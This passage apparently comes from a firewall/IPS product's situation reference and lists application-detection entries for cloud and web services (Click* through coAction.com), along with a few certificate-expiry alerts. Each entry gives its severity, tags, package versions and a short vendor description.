Description: ClickBook is the solution that fully automates the menial tasks associated with managing customer appointments, and increases customer engagement through real-time, self-service booking and automated text and email reminders.
Back to top

Clickdesk

About this situation: ClickDesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: ClickDesk provides a free live chat software to boost user engagement through live chat, voice chat, video chat, social media management, real-time analytics and an integrated help desk to manage support tickets and offline chats. Instantly answer questions from your web visitors, analyze user behavior, increase social traffic and drive conversions.
Back to top

ClickMeeting

About this situation: Application ClickMeeting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The ClickMeeting platform combines online collaboration, with the power of rich media and custom branding. Users can hold team meetings on the fly, present global webinars in high-impact video, share desktops, brainstorm new ideas, and poll attendees
Back to top

ClickSoftware

About this situation: Application ClickSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClickSoftware - provider of field service and workforce management software for every size of field service business in any industry.
Back to top

Clicksor

About this situation: Application Clicksor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clicksor is an online contextual advertising network.
Back to top

ClickSquared

About this situation: Application ClickSquared detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClickSquared offers SaaS cross-channel campaign management and cloud marketing software, and customer analytics to B2C marketers.
Back to top

ClickStreamTV

About this situation: Application ClickStreamTV detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClickStreamTv is an open source video platform designed for the Small to Medium business sector.
Back to top

Clicktale

About this situation: Clicktale usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Clicktale analytics service is qualitative and provides a full video playback option for each individual visitor's session.
Back to top

ClickThroo

About this situation: Application ClickThroo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Click Throo - landing page creator (including mobile and A/B split-testing platform, optimization engine, and tracking system.
Back to top

Clicktime

About this situation: ClickTime usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: ClickTime offers online timesheet systems and expense services for time tracking, billing, cost accounting, and payroll applications. The time tracking software provides for offline time tracking, customizable reports and data-sharing for legacy applications.
Back to top

Clicktools

About this situation: Clicktools usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Clicktools provides a cloud-based solution that enables organizations to collect information through surveys, scripts, and forms; centralize the data in CRM; and act on insights to deepen customer relationships.
Back to top

Clicky

About this situation: Application Clicky detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clicky Web Analytics is simply the best way to monitor, analyze, and react to your blog or web site's traffic in real time.
Back to top

Client Protection Certificate Authority expires soon

About this situation: Client Protection Certificate Authority expires soon
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-1535-5242
Description: The Client Protection Certificate Authority for the engine expires in less than 90 days. Create a new Client Protection Certificate Authority for the engine.
Back to top

Client Protection Certificate Authority has expired

About this situation: Client Protection Certificate Authority has expired
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Description: The Client Protection Certificate Authority for the engine has expired. Create a new Client Protection Certificate Authority for the engine.
Back to top

Client Web Access HTTPS Certificate expires soon

About this situation: Client Web Access Certificate expires soon
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1535-5242
Description: The Client Web Access HTTPS Certificate for the Management Server expires in less than 90 days. Create new TLS Server Credentials for the Management Server.
Back to top

Client Web Access HTTPS Certificate has expired

About this situation: Client Web Access HTTPS Certificate has expired
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1296-5242
Description: The 'Client Web Access HTTPS Certificate for the Management Server has expired. Create new TLS Server Credentials for the Management Server.
Back to top

ClientSpot

About this situation: Application ClientSpot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ExtremePlanner Software designs and develops Web based project management solution for modern software development teams. Its products include ClientSpot, ExtremePlanner, and Agile Project Planning.
Back to top

Clinical-Trials-Management-System

About this situation: Application Clinical-Trials-Management-System detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClinPlus CTMS was designed specifically to help sponsors and CROs overcome the technical challenges associated with managing clinical trials and was developed on the principle that by improving user accessibility and communications, tremendous efficienc
Back to top

Clinked

About this situation: Application Clinked detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clinked is a cloud-based client portal and collaboration tool, enabling teams, project groups and business clients to all collaborate on documents and files.
Back to top

Clio

About this situation: Application Clio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clio - conference cloud service
Back to top

Clip2Net

About this situation: Clip2Net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: Clip2Net Instant Upload is a web publishing collaboration application.
Back to top

ClipperCard

About this situation: Application ClipperCard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clipper is the all-in-one transit card for the Bay Area, and in limited locations you can use it to pay for parking.
Back to top

Clipular

About this situation: Application Clipular detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clipular - Screen capture, share and collect tool for Chrome .
Back to top

clock.in

About this situation: Application clock.in detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clock.in mobile solution allows employees within businesses of any size to submit activity reports, provide proof of delivery/service, view work documents, transmit GPS location, clock in/out with job codes and submit manager defined business forms.
Back to top

ClockIn-Portal

About this situation: Application ClockIn-Portal detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClockIn Portal is an easy-to-use time-tracking and attendance system that you and your employees can access with any web-enabled device.
Back to top

Clockspot

About this situation: Application Clockspot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clockspot is the online time clock and timesheet software, designed for business owners, bookkeepers, and payroll professionals.
Back to top

Cloob

About this situation: Cloob usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Close.io

About this situation: Application Close.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Close.io - CRM and sales communication platform with integrated VoIP phone and email syncing.
Back to top

Cloud-66

About this situation: Application Cloud-66 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud 66 enables customers to build, manage and maintain their infrastructure on any public or private cloud to deliver web services, mobile backends and APIs to their users.
Back to top

Cloud-Aspects

About this situation: Application Cloud-Aspects detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Application Hosting, quickbooks, quick books, cloud server, QuickBooks, hosting, peachtree hosting, business servers, remote server, hosting and remote access
Back to top

Cloud-collaboration-spaces

About this situation: Application Cloud-collaboration-spaces detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TallyFox provides cloud based collaboration solutions that integrate knowledge, content and project management.
Back to top

Cloud-Guardian

About this situation: Application Cloud-Guardian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Guardian help you an assurance that your Cloud adoption won't increase the business risks.
Back to top

Cloud-My-Office

About this situation: Application Cloud-My-Office detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud My Office offers several different partner programs. Fast, reliable and secure cloud virtual desktop solutons.
Back to top

Cloud-Plus

About this situation: Application Cloud-Plus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Plus - solution that increases operational agility and facilitates intelligent accounting practices
Back to top

Cloud-Services-Depot

About this situation: Application Cloud-Services-Depot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ImageDepot is an on-demand web-based litigation support software suite delivered over the internet as a service that supports litigation document hosting and first pass native review for electronic
Back to top

Cloud-Softphone

About this situation: Application Cloud-Softphone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Softphone lets you create your own mobile SIP VoIP app without the cost and hassle of development. You can have your own branded mobile app available for iPhone and Android.
Back to top

Cloud-Storage

About this situation: Application Cloud-Storage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Storage allows link your preferred storage and have on-the-go access to your files.
Back to top

Cloud-Testing

About this situation: Application Cloud-Testing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UserReplay is a Digital Customer Experience Management (CEM) software solution. UserReplay provides valuable insight into what eCommerce customers actually experience. UserReplay helps to optimise the online channel by identifying, diagnosing and fixing barriers to conversion. UserReplay identifies all the main categories of conversion barriers: Usability problems, confusing business logic, technical problems, and performance problems.
Back to top

Cloud9-IDE

About this situation: Application Cloud9-IDE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud9 IDE is a cloud-based Integrated Development Environment that enables web and mobile developers to collaborate in remote teams.
Back to top

Cloud9-Realtime

About this situation: Application Cloud9-Realtime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud9 Real Time is an accredited Managed Service Provider delivering dynamic cloud solutions for anytime, anywhere access. Licensed by both Intuit and Sage for commercial hosting and offering customized, privately labeled, all-in-one virtual office solutions, Cloud9 Real Time provides clients a secure, private, and reliable cloud experience. Our staff and services have directly contributed to ongoing recognition and accolades from several top industry leaders
Back to top

Cloud9analytics

About this situation: Application Cloud9analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: C9 delivers predictive sales applications that increase revenue, generate more precise forecasts and mitigate pipeline risk. By combining data science with products that improve sales execution, C9 enables leading companies like Yahoo
Back to top

CloudA

About this situation: Application CloudA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudA - cloud storage service.
Back to top

Cloudability

About this situation: Cloudability usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Cloudability helps companies manage their cloud spending across departments, across products and across their entire infrastructure.
Back to top

Cloudacl

About this situation: Application Cloudacl detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudacl- cloud based service is based on Hadoop software stack and can scale out to thousands of servers, providing high realtime performance and powerful analytical backend at the same time.
Back to top

CloudAlly

About this situation: Application CloudAlly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudAlly provides automated daily backups of leading online services such as Google Apps, Salesforce, Gmail, Yahoo Mail, Amazon SimpleDB, DynamoDB and more to unlimited Amazon S3 secure storage. System Admins can activate backups with a few simple clicks. This eliminates manually intensive tasks and ensures that online data can be recovered at any time.
Back to top

Cloudant

About this situation: Application Cloudant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudant is a Massachusetts-based enterprise software company which provides an open source non-relational, distributed database service of the same name that requires zero-configuration.
Back to top

Cloudapp

About this situation: CloudApp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to share screen shots, documents, code snippets, audio, video, zip archives.
Back to top

CloudatCost

About this situation: Application CloudatCost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudatCost brings a Cloud and VPS Hosting by leveraging our own national network and data centers across Canada.
Back to top

Cloudbees

About this situation: CloudBees usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: CloudBees PaaS was the first production PaaS to support the entire application lifecycle from development to deployment.CloudBees divides its cloud services into two main categories: development services and deloyment/management services web-based applications.
Back to top

CloudBerry-Lab

About this situation: Application CloudBerry-Lab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudBerry Lab is a vendor of cloud backup and cloud storage management solutions.
Back to top

Cloudbook

About this situation: Application Cloudbook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudbook is a resource to educate anyone who wants to build, buy, sell or invest in Cloud Computing companies, applications or infrastructure.
Back to top

CloudCentral

About this situation: Application CloudCentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudCentral - Australian provider of cloud infrastructure and platforms.
Back to top

CloudCMS

About this situation: Application CloudCMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Content Management System lets any business create, manage and publish amazing content to web and mobile apps.
Back to top

CloudCodes

About this situation: Application CloudCodes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudCodes - Google Apps security solution with essential access control and security hacks for security conscious admin along with Rights Management solution for email.
Back to top

CloudController

About this situation: Application CloudController detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudController from InContinuum Software is a software platform that bridges the gap between the corporate data center and the back-office.
Back to top

CloudConvert

About this situation: Application CloudConvert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudConvert provides online file converting service.
Back to top

CloudEntr

About this situation: Application CloudEntr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudEntr is the simple and secure way that businesses login to the cloud. It's trusted, one-password, one-click access to all your web applications, in a single vault available from any browser.
Back to top

Cloudfinder

About this situation: Application Cloudfinder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Backup Service - Discover, Back up, Stay informed
Back to top

Cloudflare

About this situation: Cloudflare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-629-5211
Description: Cloudflare is a content distribution service.
Back to top

CloudFuze

About this situation: Application CloudFuze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudFuze platform provides a robust set of management capabilities that make it possible to collaborate and manage files and documents regardless of where they reside. Single platform across all of their devices to access and manage any file or document regardless of where it is stored.
Back to top

Cloudinary

About this situation: Application Cloudinary detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudinary is a cloud-based image management SaaS for web and mobile applications.
Back to top

CloudLock

About this situation: Application CloudLock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudLock is a provider of cloud cybersecurity and CASB solutions, securing SaaS, PaaS, IaaS, and IDaaS environments and extends custom security services to homegrown applications, as well as ISV offerings.
Back to top

CloudMagic

About this situation: Application CloudMagic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudMagic is an email app for iPhone, iPad and Android. CloudMagic supports Gmail, Exchange, Yahoo, Outlook, iCloud, Google Apps, Office 365 and IMAP accounts.
Back to top

Cloudmark-Desktop

About this situation: Cloudmark Desktop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This software delivers complete spam, phishing and virus protection for Microsoft Outlook and Microsoft Outlook Express. It is a lightweight plug-in that appears as a toolbar on the email client. Source: Cloudmark
Back to top

Cloudme

About this situation: CloudMe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to access cloud storage, synchronize files and download client software. Source: Wikipedia
Back to top

CloudMunch

About this situation: Application CloudMunch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudMunch's Platform-as-a-Service (PaaS) - Build, Test, Run and Manage cloud applications.
Back to top

Cloudon

About this situation: CloudOn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-629-5211
Description: CloudOn allows user to create, review and share Microsoft Office docs icluding documents, spreadsheets and presentations on mobile device.
Back to top

CloudPassage

About this situation: Application CloudPassage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudPassage Halo provides cloud server security with instant visibility and protection whether in public or private clouds.
Back to top

CloudPay

About this situation: Application CloudPay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudPay is the world's only cloud-based platform for integrated global payroll and payments processing, collaboration and delivery.
Back to top

CloudPeople

About this situation: Application CloudPeople detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudPeople - australian cloud hosting and cloud computing with high performance cloud servers.
Back to top

CloudPointe

About this situation: Application CloudPointe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudPointe is an embedded document sharing system that lets you share documents and other files from your FTP sites and cloud storage.
Back to top

CloudRanger

About this situation: Application CloudRanger detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Ranger manages the cloud on defined schedule. Reduce AWS costs by scheduling EC2 and RDS tasks. Specialists in AWS Cloud task automation worldwide. CloudRanger saves time and money, handling repetitive tasks across the cloud.
Back to top

Cloudsafe

About this situation: CloudSafe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: CloudSafe offers a secure online repository for your most valuable digital assets. It make sure data are securely stored in the Cloud..
Back to top

Cloudscaling

About this situation: Cloudscaling usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Allowes users to backup Files to the Cloud.
Back to top

CloudSDS

About this situation: Application CloudSDS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudSDS is a suite of applications to manage chemical information, MSDS, chemical inventory, incident reporting and generate regulatory reports.
Back to top

CloudSET

About this situation: Application CloudSET detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudSET - provide additional capabilities to extend agent workflows, end-user experiences, and host integrations.
Back to top

CloudShards

About this situation: Application CloudShards detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Shards specializes in VPS Hosting, Web Hosting, Atlassian Hosting and Dedicated Hosting.
Back to top

CloudShare

About this situation: Application CloudShare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudShare provides a secure self service public cloud that extends internal IT capabilities. CloudShare delivers on-demand virtual environments with virtual machines (VMs), storage, and networking. Enjoy hundreds of pre-configured Microsoft virtual machines templates and get access to fully functional environments like SAP. login from anywhere at anytime to create, access, and manage these environments using any web browser.
Back to top

CloudSigma

About this situation: Application CloudSigma detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudSigma is a Swiss and US public IaaS cloud provider offering servers that give you maximum control and flexibility. Run any OS unmodified in our cloud.
Back to top

Cloudsponge

About this situation: CloudSponge usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: CloudSponge is a software-as-a-service product that imports email address books from Linkedin, Yahoo, Hotmail, MSN, Gmail, AOL, Outlook and Mac OS X Address Book.
Back to top

CloudWare

About this situation: Application CloudWare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudWare is a system integrator. It provides data processing and data archiving systemscand mplements cloud computing solutions, offers the implementation of management and monitoring systems for infrastructure and IT services.
Back to top

CloudwareCity

About this situation: Application CloudwareCity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudwareCity is a web-based service to offer free or paid subscriptions to web app, service or content websites.
Back to top

Cloudwords

About this situation: Application Cloudwords detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudwords eliminates time-consuming tasks and delivers unprecedented visibility into the localization process.
Back to top

CloudWork

About this situation: Application CloudWork detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CloudWork sync data between business apps including CRM, Invoicing, Emailing, Support, Project Management and more.
Back to top

Cloudyn

About this situation: Application Cloudyn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudyn developed cloud monitoring and management platform that optimizes cloud management across public, private, and hybrid clouds.
Back to top

Cloudzow

About this situation: Application Cloudzow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloudzow - provides storage so that the user can store data in several different forms.
Back to top

Club-Flyers

About this situation: Application Club-Flyers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClubFlyers.com is ecommerce website dedicated to servicing nationwide print buyers.
Back to top

Club-Vps

About this situation: Application Club-Vps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Club Vps - Cloud Server, VPS, virtual server, global cloud service provider.
Back to top

Clubbox

About this situation: Clubbox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Clubbox is a bit complicated to download stuff from there, but the site is great because users can host large files.
Back to top

ClustrMaps

About this situation: Application ClustrMaps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClustrMaps is a compact visitor tracker, designed for general web and blog use.
Back to top

Cmgl

About this situation: Application Cmgl detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Computer Modelling Group Ltd.
Back to top

CMO-HSE-Software

About this situation: Application CMO-HSE-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CMO HSE Software provides Health, Safety and Environment management software for or enterprises, with the market leading mobile app.
Back to top

CMS2CMS

About this situation: Application CMS2CMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CMS2CMS is an automated migration service which provides users with an opportunity to move date between CMS or forum platforms.
Back to top

CNA

About this situation: Application CNA detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nonprofit CNA provides in-depth research and solutions-oriented analyses to help decision makers understand issues, set policies, and manage operations.
Back to top

CNN

About this situation: CNN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1179-5242
Description: CNN is an United States based international news service.
Back to top

coAction.com

About this situation: Application coAction.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
